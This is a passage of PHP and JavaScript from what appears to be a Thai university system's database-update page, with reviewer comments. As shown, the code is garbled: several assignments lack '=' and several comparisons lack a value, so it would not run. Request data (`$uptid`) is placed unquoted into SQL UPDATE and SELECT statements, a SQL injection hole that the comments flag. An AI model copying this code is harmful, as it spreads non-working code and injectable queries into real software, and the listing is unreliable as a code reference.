                SELECT `mb_id` , `mb_mpj_id` , `mb_acp_id` , `mb_std_id` , `mb_year` , `mb_tmId` , `mb_syId`
                FROM "
.$GLOBALS['DB_ESA'].".`sa_member` 
                INNER JOIN "
.$GLOBALS['DB_ESA'].".`sa_detail_project` 
                    ON dpj_id = mb_mpj_id 
                WHERE `mb_mpj_id` IS NOT NULL
                    AND dpj_year = $inputAcadyear 
                    AND dpj_status = 2 "
;
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                    echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                    die();
                }
            }
            
$acadYear $inputAcadyear;
        }
// End 5 case
    
}
?>    <br>
<? 
    
// Post-update bookkeeping: once an update branch has set $msgFlag, stamp the
// UpdateTable row for this job and let formSuccess() resubmit the form.
// NOTE(review): this listing shows assignments without '=' and a comparison
// with no right-hand literal; the code is left exactly as displayed, so
// confirm the missing tokens against the file on disk.
if($msgFlag>0) { 
        
// Job 5 is recorded with semester '0'; every other job keeps $semester.
$semester = ($uptid != 5)?$semester:'0';
        if(
$msgFlag == ) { 
            
$y date('Y');
            
$md date('m-d');
            
// Year is stored with a +543 offset (presumably Buddhist Era -- confirm).
$dateNow = ($y+543)."-".$md;
            
// NOTE(review): $uptid is taken from $_POST['uptid'] at the top of this file
// and is placed in the WHERE clause unquoted, with no integer cast visible
// here. $acadYear and $semester are quoted but no escaping is visible in this
// part of the file. Casting $uptid with (int) and passing the string values
// through mysql_real_escape_string($value, $ln_reg) before building the
// statement would stop request data from changing the query.
$oUT_sql "UPDATE ".$GLOBALS['DB_EASS'].".UpdateTable
                        SET  acadYear = '"
.$acadYear."'
                        , semester = '"
.$semester."'
                        , dateUp = '"
.$dateNow."'
                        , timeUp = '"
.date("H:i:s")."'
                        WHERE upTid = $uptid"
;
            
$result mysql_query($oUT_sql,$ln_reg);
            
// NOTE(review): mysql_query() returns a boolean for UPDATE, so there is no
// row for mysql_fetch_object() to read, and a failed UPDATE is not detected.
$oUT mysql_fetch_object($result);
        }
        
// Emits a script that resubmits the form with method=FormEnd.
formSuccess($msgFlag,$nameTable);
    }
    // Result page: reload the UpdateTable row so the summary below can show it.
    if(
$method=='FormEnd') {
        
// NOTE(review): same unescaped $uptid from the request as in the UPDATE
// above; an (int) cast here would confine it to a numeric key.
$oUT_sql "SELECT * FROM ".$GLOBALS['DB_EASS'].".UpdateTable 
                    WHERE upTid = "
.$uptid;
        
mysql_select_db($GLOBALS['DB_EASS'], $ln_reg);
        
// No link argument is passed, so the most recently opened connection is used.
$result mysql_query($oUT_sql);
        
$oUT mysql_fetch_object($result);
?>


     <table  width="477" height="55"  border="0" align="center" cellpadding="1" cellspacing="1"  bgcolor="#0080C0">
<? if($formUpdate == ) { ?>
    <tr align="center" bgcolor="#FFFFFF">
            <td width="580" align="center"><span class="fontMark7">ปรับปรุง<font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"> 
              "<? echo $oUT->nameTable?>" </font> 
            <? if($uptid != 5){
                    echo  
'ในปีภาคการศึกษาที่ '.$oUT->semester.'/'$oUT->acadYear
                }else{
                    echo  
'ในปีการศึกษา '$oUT->acadYear
                }
            
?> 
              <br>
              </span><span class="fontMark7">
              ณ วันที่ <? echo abbreDate2($oUT->dateUp,'/'); ?> <? echo "เวลา" ?><? echo $oUT->timeUp?></span><br>
              <span class = "fontMark2"> เรียบร้อยแล้ว </span></td>
    </tr>
    <? } else if($formUpdate == ) { ?>
    <tr align="center" bgcolor="#FFFFFF">
            <td width="580"align="center"><span class="fontMark7"><b> ไม่สามารถปรับปรุง <? echo $oUT->nameTable?> ได้ 
              </b><br>โปรดปรับปรุงข้อมูลใหม่อีกครั้ง
               </font>
              </span></td>
    </tr>

<?      ?>
    </table>
<?    ?>

  <br>
  <table width="742" border="0">
          <tr> 
            <td height="22"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>"><b>หมายเหตุ 
              : </b></font></td>
            <td colspan="2"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>"><img src="../picture/edit1.gif" alt="แก้ไขการอัพเดท" border="0" > 
              หมายถึง เลือกเแก้ไขหรือเลือกปรับปรุงข้อมูล โดยข้อมูลจะแบ่งออกเป็น 
              4 ส่วนคือ ข้อมูลนักศึกษา ข้อมูลอาจารย์ ข้อมูลรายวิชา </font></td>
          </tr>
          <tr> 
            <td>&nbsp;</td>
            <td width="15">&nbsp;</td>
            <td width="651"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>">และข้อมูลการลงทะเบียน</font> 
              <font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>">โดยข้อมูลนักศึกษา 
              ข้อมูลอาจารย์ และข้อมูลรายวิชาจะปรับปรุงเป็นปีการศึกษาและภาคการศึกษาปัจจุบัน</font></td>
          </tr>
          <tr> 
            <td>&nbsp;</td>
            <td>&nbsp;</td>
            <td><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>">สำหรับข้อมูลการลงทะเบียน 
              สามารถเลือกปรับปรุงปีการศึกษา และภาคการศึกษาเองได้</font></td>
          </tr>
          <tr> 
            <td width="62">&nbsp;</td>
            <td colspan="2"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>"><img src="../picture/save.gif" alt="บันทึกการอัพเดท" border="0" > 
              หมายถึง ยืนยันการบันทึกข้อมูล ซึ่งเมื่อกดยืนยันระบบจะทำการปรับปรุงข้อมูล 
              ซึ่งเมื่อปรับปรุงข้อมูลสำเร็จแล้วจะแสดงผลการบันทึก</font></td>
          </tr>
          <tr> 
            <td>&nbsp;</td>
            <td>&nbsp;</td>
            <td><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>"> 
              โดยแสดงเป็นปีการศึกษา ภาคการศึกษา และวันที่/เวลาปรับปรุงล่าสุด ดังตารางข้างบน 
              และจะแสดงข้อความแสดงผลลัพธ์ท้ายตาราง</font></td>
          </tr>
          <tr> 
            <td>&nbsp;</td>
            <td>&nbsp;</td>
            <td><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>">ทั้งในกรณีที่ปรับปรุงข้อมูลสำเร็จหรือไม่สำเร็จ</font></td>
          </tr>
          <tr> 
            <td>&nbsp;</td>
            <td colspan="2">&nbsp;    <font color="#FFFFFF" size="2">
<?php
// Prints this script's last-modified time into the page; the enclosing
// <font> element is white (#FFFFFF).
// NOTE(review): some operators appear to be missing from this listing; the
// code is left exactly as displayed.
$filename 
'updateDBRegist.php';
if (
file_exists($filename)) {
    echo 
"$filename was last modified: " date ("F d Y H:i:s."filemtime($filename));
}
?>

    </font></td>
          </tr>
        </table>

</fieldset>
</td></tr>
</table>

</form>
<?php

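/**
 * Emit an inline script that stores the update result in the hidden fields of
 * the "formdata" form and resubmits it with method=FormEnd.
 *
 * Both values are written inside single-quoted JavaScript string literals.
 * $nameTable reaches this function from $_POST['nameTable'], so every byte
 * that could end the literal or the enclosing <script> element is replaced by
 * a \xNN escape before it is printed. The JavaScript engine turns the escapes
 * back into the original characters, so the submitted values are unchanged.
 *
 * @param mixed  $msgFlag   Result flag copied into the formUpdate field.
 * @param string $nameTable Display name copied into the nameTable field.
 * @return void
 */
function formSuccess($msgFlag,$nameTable){
    // Byte-wise replacement; assumes the single-byte tis-620 charset this page
    // declares in its <meta> tag, so no multi-byte character can be split.
    $jsEscapes = array(
        "\\" => '\\x5C',
        "'"  => '\\x27',
        '"'  => '\\x22',
        '<'  => '\\x3C',
        '>'  => '\\x3E',
        '&'  => '\\x26',
        "\r" => '\\x0D',
        "\n" => '\\x0A',
    );
    $flagLiteral = strtr((string) $msgFlag, $jsEscapes);
    $nameLiteral = strtr((string) $nameTable, $jsEscapes);
?>
<script language="javascript">
    document.formdata.method.value="FormEnd";
    document.formdata.formUpdate.value='<?php echo $flagLiteral; ?>';
    document.formdata.nameTable.value='<?php echo $nameLiteral; ?>';
    document.formdata.submit();
</script>
<?php
}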
?>

<script language="javascript">
/**
 * Put the page into edit mode for item `i`.
 *
 * Writes "FormEdit" followed by `i` into the hidden `method` field of the
 * formdata form and submits the form.
 */
function doFormEdit(i){
    var form = document.formdata;
    form.method.value = "FormEdit" + i;
    form.submit();
}

/**
 * Start update job `i` (1-5) after the user confirms it.
 *
 * The hidden `method` field is always set to "FormStart". Jobs 1-3 ask for
 * confirmation and then submit with a job-specific `formUpdate` value, the
 * table name `txt1` and the job id. Jobs 4 and 5 additionally require the
 * academic-year field to be filled in; job 4 also reads the selected semester
 * and does not set `nameTable`. Any other `i` only sets `method`.
 *
 * `txt2` is accepted but not used.
 */
function doFormMain(i,txt1,txt2){
    var form = document.formdata;
    form.method.value = "FormStart";

    // Jobs 1-3 share one flow and differ only in the formUpdate value.
    var masterForm = null;
    if (i == 1) {
        masterForm = "FormStdMaster";
    } else if (i == 2) {
        masterForm = "FormOfficer";
    } else if (i == 3) {
        masterForm = "FormCourse";
    }

    if (masterForm !== null) {
        if (confirm('ต้องการปรับปรุง'+txt1+' ใช่หรือไม่ !')) {
            form.formUpdate.value = masterForm;
            form.nameTable.value = txt1;
            form.uptid.value = i;
            form.submit();
        }
        return;
    }

    var isRegistration = (i == 4);
    if (!isRegistration && !(i == 5)) {
        return;
    }

    // Jobs 4 and 5 need an academic year before anything is submitted.
    if (form.inputAcadyear.value == "") {
        alert("กรุณากรอกปีการศึกษา !");
        return;
    }
    var year = form.inputAcadyear.value;

    if (isRegistration) {
        var semValue = form.selectSemester.value;
        var semName; // stays undefined when the value is not 1, 2 or 3
        if (semValue == 1) {
            semName = "ภาคการศึกษาที่1";
        } else if (semValue == 2) {
            semName = "ภาคการศึกษาที่2";
        } else if (semValue == 3) {
            semName = "ภาคฤดูร้อน";
        }

        var question = 'ต้องการปรับปรุงข้อมูลการลงทะเบียนนักศึกษา '+"'ปีการศึกษา"+ year + " " + semName +"'"+' ใช่หรือไม่ !';
        if (confirm(question)) {
            form.formUpdate.value = "FormReg";
            form.uptid.value = i;
            form.submit();
        }
        return;
    }

    if (confirm('ต้องการปรับปรุง'+txt1+"'ปีการศึกษา "+ year + ' ใช่หรือไม่ !')) {
        form.formUpdate.value = "FormEsa";
        form.nameTable.value = txt1;
        form.uptid.value = i;
        form.submit();
    }
}

/**
 * Request every update job at once: sets `method` to "FormStartAll" and
 * `formUpdate` to "FormAll" on the formdata form, then submits it.
 */
function doFormAll(){
    var form = document.formdata;
    form.method.value = "FormStartAll";
    form.formUpdate.value = "FormAll";
    form.submit();
}

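/**
 * Show or hide a numbered group of elements.
 *
 * Walks the ids target+1, target+2, ... until one is missing and flips each
 * element's inline `display` between 'none' and '' (the stylesheet default).
 *
 * The element reference is kept in a local variable; the earlier version
 * assigned to an undeclared `obj`, which created a global.
 */
function toggle(target)
{
    var row = 1;
    var obj;
    while ((obj = document.getElementById(target + row))) {
        obj.style.display = (obj.style.display == 'none') ? '' : 'none';
        row++;
    }
}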

</script>
